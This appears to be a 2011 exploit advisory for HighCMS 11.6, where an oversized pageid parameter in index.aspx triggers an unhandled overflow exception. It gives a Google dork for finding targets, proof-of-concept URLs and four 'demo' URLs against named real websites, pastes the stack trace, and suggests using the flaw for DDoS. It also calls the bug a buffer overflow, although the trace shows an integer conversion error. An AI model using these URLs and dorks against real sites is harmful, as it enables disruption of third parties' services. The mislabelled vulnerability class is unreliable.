---------------------------------------------------------------- HighCMS <= (index.aspx) Buffer Overflow Vulnerability ---------------------------------------------------------------- # Exploit Title:HighCMS <= (index.aspx) Buffer Overflow Vulnerability # Google Dork: inurl:index.aspx?siteid=1&pageid= # Application Name: [HighCMS] # Date: 2011-10-30 # Author: BHG Security Center # Home: Http://black-hg.org # Software Link: [ http://www.aryanic.com/products-highcms.html ] # Vendor Response(s): They didn't respond to the emails. # Version: [ 11.6 ] # Impact : [ Low ] # Tested on: [Windows Server 2003 /IIS 6.0] # CVE : Webapps +-----------------------+ | Overflow Exception | +-----------------------+ Description: You can use many of these vulnerabilities do Ddos attacks, including refref # PoC(s): http://[HOST]/index.aspx?siteid=1&pageid=[Overflow] http://[HOST]/index.aspx?siteid=1&pageid=4141414141 <> True # Demo(s): http://www.mayadin.biz/index.aspx?siteid=1&pageid=4141414141 http://ielts-house.com/index.aspx?siteid=1&pageid=4141414141 http://www.persiangoldfish.com/index.aspx?siteid=1&pageid=414141414141 http://honarnews.org/index.aspx?siteid=1&pageid=4141414141 # Output Data: [OverflowException: Arithmetic operation resulted in an overflow.] Microsoft.VisualBasic.CompilerServices.Conversions.ToInteger(String Value) +165 highcms.index.page_select() +1272 highcms.index.make_page() +2304 highcms.index.Page_Load(Object , EventArgs ) +8725 System.Web.UI.Control.OnLoad(EventArgs e) +132 System.Web.UI.Control.LoadRecursive() +66 System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +2428 # Reference: [1] For more information about this vulnerability (URL: http://msdn.microsoft.com/en-us/library/system.overflowexception.aspx) [2] For more information about this vulnerability (URL: https://www.owasp.org/index.php/Buffer_Overflows) # Important Notes: - Vendor did not respond to the email as well as the phone. As there is not any contact form or email address in the website, we have used all the emails which had been found by searching in Google such as support, info, and so on. # Greets To : Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ 2MzRp ArYaIeIrAn ~ Mikili ~ NoL1m1t ~ cmaxx ~ G3n3Rall ~ Mr.XHat ~ cmaxx G3n3Rall ~ Mr.XHat ~ M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter s3cure.p0rt ~ THANKS TO ALL Iranian HackerZ ./Persian Gulf ===========================================[End]=============================================